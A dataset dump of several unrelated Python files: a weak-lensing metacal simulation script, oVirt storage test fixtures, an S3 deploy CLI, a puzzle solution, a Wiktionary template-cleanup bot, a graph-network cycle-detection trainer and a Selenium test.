center=galsim.PositionD(x=psf_center_x, y=psf_center_y)).array\n\n return im.ravel(), psf_im.ravel(), bmask_im.ravel(), im_start_row, im_end_row, psf_start_row, psf_end_row\n\n\ndef replace_all_cutouts_by_sims(input_medsname, seed, g1, g2, verbose=False):\n m = fitsio.FITS(input_medsname,mode='rw') #opens the input file\n Nobjects = m[1].get_nrows() #gets number of objects (rows) in the file\n for i_obj in range(Nobjects): #loops over objects in the file\n Ncutout = m[1]['ncutout'][i_obj]\n if verbose and i_obj%1000==0: print(\"Object %d has %d cutouts to be replaced\"%(i_obj,Ncutout))\n for j_cut in range(Ncutout): #loops over cutout in each object in the file\n im, psf, bmask, im_start, im_end, psf_start, psf_end = make_sim_one_cutout(seed=seed, g1= g1, g2=g2,\n open_meds=m, obj_ind=i_obj, cutout=j_cut)\n\n m['image_cutouts'].write(im, im_start)\n m['bmask_cutouts'].write(bmask, im_start)\n m['psf'].write(psf, psf_start)\n m.close()\n\nif __name__ == \"__main__\":\n\n import sys\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal/tests')\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal')\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal/metacal')\n\n import test_metacal\n\n seed = int(sys.argv[1])\n\n\n input_medsname = r'/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d.fits'%seed\n replace_all_cutouts_by_sims(input_medsname, seed, 0.02, 0.00, verbose=True)\n\n input_medsname = r'/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d.fits'%seed\n replace_all_cutouts_by_sims(input_medsname, seed, -0.02, 0.00, verbose=True)\n\n #Generate output files\n\n from _step import _run_metacal as run_metacal\n\n filename = ['/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d.fits'%seed]\n output = run_metacal(filename, 8)\n fitsio.write('/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d_metacal_output.fits'%seed, output, clobber=True)\n\n filename = ['/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d.fits'%seed]\n output = run_metacal(filename, 8)\n fitsio.write('/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d_metacal_output.fits'%seed, output, clobber=True)\n","sub_path":"code/Metacal_test_V1.py","file_name":"Metacal_test_V1.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131203627","text":"import config\nimport pytest\nimport logging\nfrom art.unittest_lib.common import testflow\nfrom art.rhevm_api.tests_lib.low_level import (\n hosts as ll_hosts,\n storagedomains as ll_sd,\n datacenters as ll_dc,\n clusters as ll_clusters,\n jobs as ll_jobs,\n vms as ll_vms,\n templates as ll_templates,\n)\nfrom art.rhevm_api.tests_lib.high_level import (\n storagedomains as hl_sd\n)\nfrom rhevmtests.storage import helpers as storage_helpers\nlogger = logging.getLogger(__name__)\nfrom art.unittest_lib.common import StorageTest as TestCase # noqa\n\n\n@pytest.fixture(scope='class')\ndef init_hsm_host(request, storage):\n \"\"\"\n Selects the first non-SPM host\n \"\"\"\n self = request.node.cls\n\n status, hsm_host = ll_hosts.get_any_non_spm_host(\n config.HOSTS, cluster_name=config.CLUSTER_NAME\n )\n assert status, \"Failed to retrieve a non-SPM host on cluster '%s'\" % (\n config.CLUSTER_NAME\n )\n self.host_name = hsm_host['hsmHost']\n\n\n@pytest.fixture(scope='class')\ndef init_spm_host(request, storage):\n \"\"\"\n Selects the first non-SPM host\n \"\"\"\n self = request.node.cls\n\n self.spm_host = ll_hosts.get_spm_host(config.HOSTS)\n assert self.spm_host, \"Failed tp retrieve SPM host on cluster '%s'\" % (\n config.CLUSTER_NAME\n )\n\n\n@pytest.fixture(scope='class')\ndef create_dc_with_no_hosts(request, storage):\n \"\"\"\n Creates a data center with no hosts\n \"\"\"\n self = request.node.cls\n\n assert ll_dc.addDataCenter(\n True, name=self.new_dc_name, local=False, version=self.dc_version\n ), \"Failed to create data center '%s'\" % self.new_dc_name\n\n\n@pytest.fixture(scope='class')\ndef create_cluster_with_no_hosts(request, storage):\n \"\"\"\n Creates a cluster with no hosts\n \"\"\"\n self = request.node.cls\n\n self.host_ip = ll_hosts.get_host_ip(self.host_name)\n logger.info(\n \"Retrieve the first host from the 2nd cluster (in original Data \"\n \"center)\"\n )\n assert ll_clusters.addCluster(\n True, name=self.cluster_name, cpu=config.CPU_NAME,\n data_center=self.new_dc_name, version=self.cluster_version\n ), \"Failed to create Cluster '%s'\" % self.cluster_name\n\n\n@pytest.fixture(scope='class')\ndef create_one_or_more_storage_domains_same_type_for_upgrade(request, storage):\n \"\"\"\n Creates one or more storage domain for upgrade tests\n \"\"\"\n self = request.node.cls\n\n self.sd_names = []\n for sd in range(self.new_storage_domains_count):\n self.storage_domain = (\n 'upgrade_%s_to_%s_%s' % self.name_pattern + str(sd)\n )\n\n storage_helpers.add_storage_domain(\n storage_domain=self.storage_domain, data_center=self.new_dc_name,\n index=sd, storage_type=self.storage\n )\n self.sd_names.append(self.storage_domain)\n self.storage_domain = self.sd_names[0]\n\n\n@pytest.fixture(scope='class')\ndef deactivate_and_remove_non_master_domains(request, storage):\n \"\"\"\n Remove storage domains created for the test\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n found, master_domain = ll_sd.findMasterStorageDomain(\n True, self.new_dc_name\n )\n assert found, (\n \"Could not find master storage domain on data center '%s'\"\n % self.new_dc_name\n )\n master_domain = master_domain['masterDomain']\n testflow.teardown(\n \"Data center's %s master domain is %s\", self.new_dc_name,\n master_domain\n )\n\n for sd_name in self.sd_names:\n if ll_sd.checkIfStorageDomainExist(True, sd_name):\n if not sd_name == master_domain:\n testflow.teardown(\n \"deactivating storage domain %s\", sd_name\n )\n assert hl_sd.deactivate_domain(\n self.new_dc_name, sd_name, config.ENGINE\n ), \"Failed to deactivate storage domain %s\" % sd_name\n testflow.teardown(\"Removing storage domain %s \", sd_name)\n assert hl_sd.remove_storage_domain(\n sd_name, self.new_dc_name, self.host_name,\n engine=config.ENGINE, format_disk=True\n ), \"Failed to remove storage domain %s\" % sd_name\n self.storage_domain = master_domain\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef remove_unattached_domain(request, storage):\n \"\"\"\n Remove the unattached domain left after DC removal\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n if ll_sd.checkIfStorageDomainExist(True, self.storage_domain):\n testflow.teardown(\"Remove storage domain %s\", self.storage_domain)\n assert ll_sd.removeStorageDomain(\n True, self.storage_domain, self.host_name, format='true',\n ), (\"Failed to remove storage domain %s\", self.storage_domain)\n\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef initialize_dc_parameters_for_upgrade(request, storage):\n \"\"\"\n Initializing DC parameters for 4.0 to 4.1 upgrade\n \"\"\"\n\n self = request.node.cls\n\n self.name_pattern = '4_0', '4_1', self.__name__\n self.new_dc_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_DC\n )\n self.cluster_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_CLUSTER\n )\n self.nfs_sd_name = \"sd_upgrade_%s_to_%s_nfs_%s\" % self.name_pattern\n self.iscsi_sd_name = \"sd_upgrade_%s_to_%s_iscsi_%s\" % self.name_pattern\n self.gluster_sd_name = \"sd_upgrade_%s_to_%s_gluster_%s\" % self.name_pattern\n self.fcp_sd_name = \"sd_upgrade_%s_to_%s_fcp_%s\" % self.name_pattern\n self.cluster_version = '4.0'\n self.cluster_upgraded_version = '4.1'\n self.dc_version = '4.0'\n self.dc_upgraded_version = '4.1'\n self.storage_format = 'v3'\n self.upgraded_storage_format = 'v4'\n\n\n@pytest.fixture(scope='class')\ndef remove_another_vm(request, storage):\n \"\"\"\n Remove another VM created during the test\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n testflow.teardown(\"Remove VM %s\", self.new_vm_name)\n assert ll_vms.safely_remove_vms([self.new_vm_name]), (\n \"Failed to power off and remove VM %s\" % self.new_vm_name\n )\n ll_jobs.wait_for_jobs([config.JOB_REMOVE_VM])\n\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef init_test_vm_name(request, storage):\n \"\"\"\n Initialize test vm name\n \"\"\"\n\n self = request.node.cls\n\n self.new_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n self.vm_names = list()\n self.vm_names.append(self.new_vm_name)\n\n\n@pytest.fixture(scope='class')\ndef init_test_template_name(request, storage):\n \"\"\"\n Initialize test template name\n \"\"\"\n\n self = request.node.cls\n\n self.template_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_TEMPLATE\n )\n\n\n@pytest.fixture(scope='class')\ndef init_base_params(request, storage):\n \"\"\"\n Initialize base class parameters\n \"\"\"\n\n self = request.node.cls\n\n if not hasattr(self, 'new_storage_domains_count'):\n self.new_storage_domains_count = 1\n self.host_name = None\n self.storage_domain = None\n self.name_pattern = None\n self.new_dc_name = None\n self.nfs_sd_name = None\n self.iscsi_sd_name = None\n self.gluster_sd_name = None\n self.fcp_sd_name = None\n self.cluster_version = None\n self.cluster_upgraded_version = None\n self.dc_version = None\n self.dc_upgraded_version = None\n self.storage_format = None\n self.upgraded_storage_format = None\n self.disk_count = None\n self.template_name = None\n self.templates_names = list()\n self.template_disk_name = None\n\n\n@pytest.fixture(scope='class')\ndef get_template_from_cluster(request, storage):\n \"\"\"\n Get existing first template from cluster\n \"\"\"\n self = request.node.cls\n\n templates_names_list = ll_templates.get_template_from_cluster(\n self.cluster_name\n )\n\n if templates_names_list:\n self.template_name = templates_names_list[0]\n self.template_disk_name = ll_templates.getTemplateDisks(\n self.template_name\n )[0].get_name()\n\n\n@pytest.fixture()\ndef initialize_storage_domain_params(request, storage):\n \"\"\"\n Initialize storage domain parameters for add operation\n \"\"\"\n self = request.node.cls\n\n self.storage_domain_kwargs = {\n 'storage_type': config.STORAGE_TYPE_NFS,\n 'address': config.NFS_DOMAINS_KWARGS[1]['address'],\n 'path': config.NFS_DOMAINS_KWARGS[1]['path']\n }\n","sub_path":"art/tests/rhevmtests/storage/storage_qcow2_v3/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":8746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"479526012","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport argparse\nimport s3\n\n\ndef main():\n \"\"\" Entry point for the package, as defined in setup.py. \"\"\"\n \n # Get command line input/output arguments\n parser = argparse.ArgumentParser(\n description='Instantly deploy static HTML sites to S3 at the command line.'\n )\n parser.add_argument(\n 'www_dir',\n help='Directory containing the HTML files for your website.'\n )\n parser.add_argument(\n 'bucket_name',\n help='Name of S3 bucket to deploy to, e.g. mybucket.'\n )\n args = parser.parse_args()\n \n # Deploy the site to S3!\n s3.deploy(args.www_dir, args.bucket_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"alotofeffort/alotofeffort.py","file_name":"alotofeffort.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275927889","text":"with open('file.in', 'rt') as fin:\n numbers = list(map(int, fin.readlines()))\n\nnumbers.sort()\ndifferences = {0: 0, 1: 0, 2: 0, 3: 1}\n\nfor i in range(len(numbers) - 1):\n differences[numbers[i + 1] - numbers[i]] += 1\n\n\ndifferences[numbers[0]] += 1\nprint(differences[1])\nprint(differences[3])\nprint(differences[1] * differences[3])\n","sub_path":"10/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152744790","text":"import sys\nimport math\nimport pickle\nimport numpy as np\nfrom sklearn import svm\n\nsplit_ratio=float(sys.argv[1])\n\nf=open(\"/home/ubuntu/results/saliency/featured.pkl\",\"rb\")\nfeatured_list=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/wordlist.pkl\",\"rb\")\nword_list=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/idf.pkl\",\"rb\")\nidf=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/centrality.pkl\",\"rb\")\ncentrality=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/keyphrase.pkl\",\"rb\")\nkey_phrase=pickle.load(f)\nf.close()\n\nf=open(\"/home/ubuntu/results/saliency/svmclf.pkl\",\"rb\")\ns_clf=pickle.load(f)\nf.close()\n\nsample_prelist=[]\ncount=0\n\nfor i in range(0,int(split_ratio*len(featured_list))):\n\tabs_dict=featured_list[i]['abs']\n\tbody_dict=featured_list[i]['body']\n\ta_mat=[]\n\tfor a_key in abs_dict.keys():\n\t\tpred_input=np.array([[key_phrase[word_list.index(a_key)],abs_dict[a_key][0],abs_dict[a_key][1]-abs_dict[a_key][0],abs_dict[a_key][2],idf[word_list.index(a_key)],centrality[a_key]]])\n\t\tpred_saliency=list(s_clf.predict(pred_input))[0]\n\t\ta_mat.append([abs_dict[a_key][0],abs_dict[a_key][1]-abs_dict[a_key][0],abs_dict[a_key][2],idf[word_list.index(a_key)],centrality[a_key],pred_saliency])\n\tif not a_mat:\n\t\tcontinue\n\tU,S,V=np.linalg.svd(np.array(a_mat),full_matrices=True)\n\tfor b_key in body_dict.keys():\n\t\tif b_key in abs_dict.keys():\n\t\t\tcontinue\n\t\tcount+=1\n\t\tprint(count,abs_dict.keys(),b_key)\n\t\t_feature=[idf[word_list.index(b_key)],centrality[b_key]]\n\t\t_feature.extend(list(V.flatten()))\n\t\tsample_prelist.append(_feature)\n\n# print(sample_prelist)\n\nf=open(\"/home/ubuntu/results/coclf/svd_trainlist.pkl\",\"wb\")\npickle.dump(sample_prelist,f)\nf.close()","sub_path":"coclf/SVDtrainSample.py","file_name":"SVDtrainSample.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496481863","text":"n = int(input())\ninn = 0\nout = 0\nfor i in range(n):\n x = int(input())\n if 10 <= x <= 20:\n inn += 1\n else:\n out += 1\n\nprint(\"%d in\\n%d out\" % (inn, out), end=\"\\n\")","sub_path":"uri-online-judge/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152453061","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, tname, pname, msg, site\n\ndef process_text_on_page(index, pagetitle, text):\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, args.verbose)\n\n def convert_traditional_to_simplified(langcode, trad):\n trad_simp = expand_text(\"{{#invoke:User:Benwing2/languages/utilities|generateForms|%s|%s}}\" % (langcode, trad))\n if not trad_simp:\n return trad_simp\n if \"||\" in trad_simp:\n trad, simp = trad_simp.split(\"||\", 1)\n return simp\n else:\n return trad_simp\n\n notes = []\n\n parsed = blib.parse_text(text)\n\n def dispchar(ch):\n # FIXME, might need fixing for Python 3\n return \"%s (%s)\" % (ch, ch.encode(\"unicode_escape\"))\n\n def check_simplified_matches_traditional(trad, simp, langcode, langname, prefix):\n if simp == trad:\n pagemsg(\"%s simplified form %s same as %s traditional %s, removing\" % (prefix, simp, langname, trad))\n return trad\n trad_to_simp = convert_traditional_to_simplified(langcode, trad)\n if not trad_to_simp:\n return False\n if trad_to_simp == simp:\n pagemsg(\"%s simplified form %s matches %s traditional %s, removing\" % (prefix, simp, langname, trad))\n return trad\n rev_trad_to_simp = convert_traditional_to_simplified(langcode, simp)\n if not rev_trad_to_simp:\n return False\n if rev_trad_to_simp == trad:\n pagemsg(\"%s simplified form %s and %s traditional %s given in reverse order from what's expected, still removing\"\n % (prefix, trad, langname, simp))\n return simp\n pagemsg(\"WARNING: %s simplified form %s doesn't match auto-generated simplified %s from %s traditional %s%s: %s\"\n % (prefix, dispchar(simp), dispchar(trad_to_simp), langname, dispchar(trad),\n (\"; assuming params reversed, 'simplified' %s doesn't match auto-generated 'simplified' %s from 'traditional' %s, either\"\n % (dispchar(trad), dispchar(rev_trad_to_simp), dispchar(simp)) if rev_trad_to_simp != simp else \"\"),\n str(t)))\n return False\n\n for t in parsed.filter_templates():\n def getp(param):\n return getparam(t, param)\n tn = tname(t)\n if tn in [\"pinyin reading of\", \"pinread\", \"pinof\"]:\n trad = getp(\"tas\") or getp(\"t\") or getp(\"trad\") or getp(\"tra\") or getp(\"1\")\n simp = getp(\"s\") or getp(\"simp\") or getp(\"sim\") or getp(\"2\")\n if simp:\n trad = check_simplified_matches_traditional(trad, simp, \"cmn\", \"Mandarin\", \"First\")\n if not trad:\n continue\n trad2 = getp(\"t2\") or getp(\"trad2\") or getp(\"tra2\") or getp(\"3\")\n simp2 = getp(\"s2\") or getp(\"simp2\") or getp(\"sim2\") or getp(\"4\")\n if simp2:\n trad2 = check_simplified_matches_traditional(trad2, simp2, \"cmn\", \"Mandarin\", \"Second\")\n if not trad2:\n continue\n remaining_params = [x for x in [getp(\"5\"), getp(\"6\"), getp(\"7\"), getp(\"8\"), getp(\"9\"), getp(\"10\")] if x]\n for param in t.params:\n pn = pname(param)\n pv = str(param.value)\n if pn not in [\n \"tas\", \"t\", \"trad\", \"tra\", \"1\",\n \"s\", \"simp\", \"sim\", \"2\",\n \"t2\", \"trad2\", \"tra2\", \"3\",\n \"s2\", \"simp2\", \"sim2\", \"4\",\n \"5\", \"6\", \"7\", \"8\", \"9\", \"10\",\n \"lang\", \"def\", # ignored\n ]:\n pagemsg(\"WARNING: Unrecognized parameter %s=%s in {{pinyin reading of}} template %s\"\n % (pn, pv, str(t)))\n break\n else: # no break\n all_numeric = [x for x in [trad, trad2] + remaining_params if x]\n origt = str(t)\n del t.params[:]\n blib.set_param_chain(t, all_numeric, \"1\")\n blib.set_template_name(t, \"cmn-pinyin of\")\n if origt != str(t):\n pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"convert {{pinyin reading of}} to {{cmn-pinyin of}}, standardize params and remove unnecessary simplified variants\")\n\n elif tn == \"yue-jyutping of\":\n trad = getp(\"tas\") or getp(\"trad\") or getp(\"tra\") or getp(\"1\")\n simp = getp(\"sim\") or getp(\"simp\") or getp(\"2\")\n if simp:\n trad = check_simplified_matches_traditional(trad, simp, \"yue\", \"Cantonese\", \"First\")\n if not trad:\n continue\n trad2 = getp(\"tra2\") or getp(\"trad2\") or getp(\"3\")\n simp2 = getp(\"sim2\") or getp(\"simp2\") or getp(\"4\")\n if simp2:\n trad2 = check_simplified_matches_traditional(trad2, simp2, \"yue\", \"Cantonese\", \"Second\")\n if not trad2:\n continue\n remaining_params = [x for x in [getp(\"5\")] if x]\n for param in t.params:\n pn = pname(param)\n pv = str(param.value)\n if pn not in [\n \"tas\", \"trad\", \"tra\", \"1\",\n \"sim\", \"simp\", \"2\",\n \"tra2\", \"trad2\", \"3\",\n \"sim2\", \"simp2\", \"4\",\n \"5\",\n ]:\n pagemsg(\"WARNING: Unrecognized parameter %s=%s in {{yue-jyutping of}} template %s\"\n % (pn, pv, str(t)))\n break\n else: # no break\n all_numeric = [x for x in [trad, trad2] + remaining_params if x]\n origt = str(t)\n del t.params[:]\n blib.set_param_chain(t, all_numeric, \"1\")\n if origt != str(t):\n pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"standardize params in {{yue-jyutping of}} and remove unnecessary simplified variants\")\n\n text = str(parsed)\n return text, notes\n\nparser = blib.create_argparser(\"Clean {{pinyin reading of}} and {{yue-jyutping of}}\", include_pagefile=True, include_stdin=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_text_on_page, edit=True, stdin=True,\n default_refs=[\"Template:pinyin reading of\", \"Template:yue-jyutping of\"])\n","sub_path":"clean_pinyin_jyutping_of.py","file_name":"clean_pinyin_jyutping_of.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346881564","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Example k-cycle classification\n\n\nimport os\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.data import DataLoader\nfrom torch_geometric.transforms import OneHotDegree\nimport argparse\nimport numpy as np\nimport time\nimport yaml\nfrom models.smp_cycles import SMP\nfrom models.gin import GIN\nfrom datasets_generation.build_cycles import FourCyclesDataset\nfrom models.utils.transforms import EyeTransform, RandomId, DenseAdjMatrix\nfrom models import ppgn\n\n# Change the following to point to the the folder where the datasets are stored\nif os.path.isdir('/datasets2/'):\n rootdir = '/datasets2/CYCLE_DETECTION/'\nelse:\n rootdir = './data/datasets_kcycle_nsamples=10000/'\nyaml_file = './config_cycles.yaml'\n# yaml_file = './benchmark/kernel/config4cycles.yaml'\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=300)\nparser.add_argument('--k', type=int, default=6,\n help=\"Length of the cycles to detect\")\nparser.add_argument('--n', type=int, default=56,\n help='Average number of nodes in the graphs')\nparser.add_argument('--save-model', action='store_true',\n help='Save the model once training is done')\nparser.add_argument('--wandb', action='store_true',\n help=\"Use weights and biases library\")\nparser.add_argument('--gpu', type=int, help='Id of gpu device. By default use cpu')\nparser.add_argument('--lr', type=float, default=0.001, help=\"Initial learning rate\")\nparser.add_argument('--batch-size', type=int, default=16)\nparser.add_argument('--weight-decay', type=float, default=0.0001)\nparser.add_argument('--clip', type=float, default=10, help=\"Gradient clipping\")\nparser.add_argument('--one-hot', action='store_true', default=False,\n help='Use a one-hot encoding of the degree as node features')\nparser.add_argument('--identifiers', action='store_true', default=False,\n help='Use a one hot encoding of the nodes as node features.')\nparser.add_argument('--random', action='store_true', help=\"Use random identifiers as node features.\")\nparser.add_argument('--name', type=str, help=\"Name for weights and biases\")\nparser.add_argument('--proportion', type=float, default=1.0,\n help='Proportion of the training data that is kept')\nargs = parser.parse_args()\n\n# Log parameters\ntest_every_epoch = 5\nprint_every_epoch = 1\nlog_interval = 20\n\nif args.name:\n args.wandb = True\n\n# Handle the device\nuse_cuda = args.gpu is not None and torch.cuda.is_available()\nif use_cuda:\n device = torch.device(\"cuda:\" + str(args.gpu))\n torch.cuda.set_device(args.gpu)\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\nelse:\n device = \"cpu\"\nargs.device = device\nargs.kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\nprint('Device used:', device)\n\n# Load the config file of the model\nwith open(yaml_file) as f:\n model_config = yaml.load(f, Loader=yaml.FullLoader)\n print(model_config)\n\nmodel_name = model_config['model_name']\nmodel_config.pop('model_name')\nprint(\"Model name:\", model_name)\n\n# Create a name for weights and biases\nif args.wandb:\n import wandb\n if args.name is None:\n if args.random:\n args.name = 'random' + f'_{args.k}_{args.n}'\n else:\n args.name = model_name + f'_{args.k}_{args.n}'\n wandb.init(project=\"smp\", config=model_config, name=args.name)\n wandb.config.update(args)\n\n# Store maximum number of nodes for each pair (k, n)\n# Used by provably powerful graph networks\nmax_num_nodes = {4: {12: 12, 20: 20, 28: 28, 36: 36},\n 6: {20: 25, 31: 38, 42: 52, 56: 65},\n 8: {28: 38, 50: 56, 66: 76, 72: 90}}\n# Store the maximum degree for the one-hot encoding\nmax_degree = {4: {12: 4, 20: 6, 28: 7, 36: 7},\n 6: {20: 4, 31: 6, 42: 8, 56: 7},\n 8: {28: 4, 50: 6, 66: 7, 72: 8}}\n\n\ndef train(epoch):\n \"\"\" Train for one epoch. \"\"\"\n model.train()\n lr_scheduler(args.lr, epoch, optimizer)\n loss_all = 0\n for batch_idx, data in enumerate(train_loader):\n data = data.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, data.y)\n loss.backward()\n loss_all += loss.item() * data.num_graphs\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)\n optimizer.step()\n return loss_all / len(train_loader.dataset)\n\n\ndef test(loader):\n model.eval()\n correct = 0\n for data in loader:\n data = data.to(device)\n output = model(data)\n pred = output.max(dim=1)[1]\n correct += pred.eq(data.y).sum().item()\n return correct / len(loader.dataset)\n\n\ndef lr_scheduler(lr, epoch, optimizer):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * (0.995 ** (epoch / 5))\n\n# Define the transform to use in the dataset\nif args.one_hot:\n max_degree = max_degree[args.k][args.n]\n transform = OneHotDegree(max_degree, cat=False)\n model_config['num_input_features'] = max_degree + 1\n if args.n == 28:\n transform = OneHotDegree(max_degree=7, cat=False)\n model_config['num_input_features'] = 8\nelif args.identifiers:\n transform = EyeTransform()\n model_config['num_input_features'] = args.n\nelif args.random:\n transform = RandomId()\n model_config['num_input_features'] = 1\nelse:\n transform = None\n model_config['num_input_features'] = 1\n\n\nstart = time.time()\n\nmodel_config['num_layers'] = args.k\n\nif model_name == 'SMP':\n model_config['use_batch_norm'] = args.k > 6 or args.n > 30\n model = SMP(**model_config).to(device)\nif model_name == 'PPGN':\n transform = DenseAdjMatrix(max_num_nodes[args.k][args.n])\n model_config.pop('num_input_features', None)\n model_config.pop('use_x', None)\n model_config.pop('use_u', None)\n model = ppgn.Powerful(**model_config).to(device)\nif model_name == 'GIN':\n model_config['use_batch_norm'] = args.k > 6 or args.n > 50\n model_config.pop('use_x', None)\n model_config.pop('hidden_u', None)\n model = GIN(**model_config).to(device)\n\noptimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.5, weight_decay=args.weight_decay)\n# Load the data\nprint(\"Transform used:\", transform)\nbatch_size = args.batch_size\ntrain_data = FourCyclesDataset(args.k, args.n, rootdir, proportion=args.proportion, train=True, transform=transform)\ntest_data = FourCyclesDataset(args.k, args.n, rootdir, proportion=args.proportion, train=False, transform=transform)\ntrain_loader = DataLoader(train_data, batch_size, shuffle=True)\ntest_loader = DataLoader(test_data, batch_size, shuffle=True)\n\nprint(\"Starting to train\")\nfor epoch in range(args.epochs):\n epoch_start = time.time()\n tr_loss = train(epoch)\n if epoch % print_every_epoch == 0:\n acc_train = test(train_loader)\n current_lr = optimizer.param_groups[0][\"lr\"]\n duration = time.time() - epoch_start\n print(f'Time:{duration:2.2f} | {epoch:5d} | Loss: {tr_loss:2.5f} | Train Acc: {acc_train:2.5f} | LR: {current_lr:.6f}')\n if epoch % test_every_epoch == 0:\n acc_test = test(test_loader)\n print(f'Test accuracy: {acc_test:2.5f}')\n if args.wandb:\n wandb.log({\"Epoch\": epoch, \"Duration\": duration, \"Train loss\": tr_loss, \"train accuracy\": acc_train,\n \"Test acc\": acc_test})\n else:\n if args.wandb:\n wandb.log({\"Epoch\": epoch, \"Duration\": duration, \"Train loss\": tr_loss, \"train accuracy\": acc_train})\n\ncur_lr = optimizer.param_groups[0][\"lr\"]\nprint(f'{epoch:2.5f} | Loss: {tr_loss:2.5f} | Train Acc: {acc_train:2.5f} | LR: {cur_lr:.6f} | Test Acc: {acc_test:2.5f}')\nprint(f'Elapsed time: {(time.time() - start) / 60:.1f} minutes')\nprint('done!')\n\nfinal_acc = test(test_loader)\nprint(f\"Final accuracy: {final_acc}\")\nprint(\"Done.\")\n","sub_path":"cycles_main.py","file_name":"cycles_main.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"521396302","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2020/12/3 6:58 下午\n# @Author : jiajia.gu\nimport unittest\nfrom selenium.webdriver.common.touch_actions import TouchActions\nfrom study_plan_sale_test.config.config import url3\nfrom study_plan_sale_test.common.common import *\nfrom study_plan_sale_test.page.studyPlanPage import StudyPlan\n\n\nclass Lv3ToLV5(unittest.TestCase):\n\n def setUp(self):\n u'''没有前置条件可以写pass'''\n print(\"开始执行\")\n # pass\n\n def test_Level(self): # 测试用例必须以test开头\n freeSalePage_url = url3\n driver=get_url(freeSalePage_url)\n page = StudyPlan(driver)\n chooseStudyInfo(page)\n # driver.TouchActions.scroll(\"am-picker-col-mask\", 0, +200).perform()\n element1 = page.am_picker_col_indicator_loc()[0]\n TouchActions(driver).long_press(element1)\n TouchActions(driver).flick_element(element1, 0, 300, 30).perform()\n\n time.sleep(3)\n page.study_plan_bt_btn_loc()[0].click() # 选择完年龄点击完成水平测试\n time.sleep(5)\n page.imager_inner_loc()[2].click() # 点击定制专属学习计划\n time.sleep(5)\n page.select_item_loc()[2].click() # 选择期望提升\n time.sleep(5)\n\n get_sale_page(page)\n\n startingLevel = page.study_target_item_content_loc()[0].get_attribute('innerHTML')\n targetingLevel = page.study_target_item_content_loc()[1].get_attribute('innerHTML')\n self.assertEqual(startingLevel, u'Lv.3', msg='失败') # 验证起始等级为lv3\n self.assertEqual(targetingLevel, u'Lv.5', msg='失败')# 验证目标等级为lv5\n\n def tearDown(self):\n u'''没有后置条件可以写pass'''\n print(\"结束...\")\n\n if __name__ == \"__main__\":\n 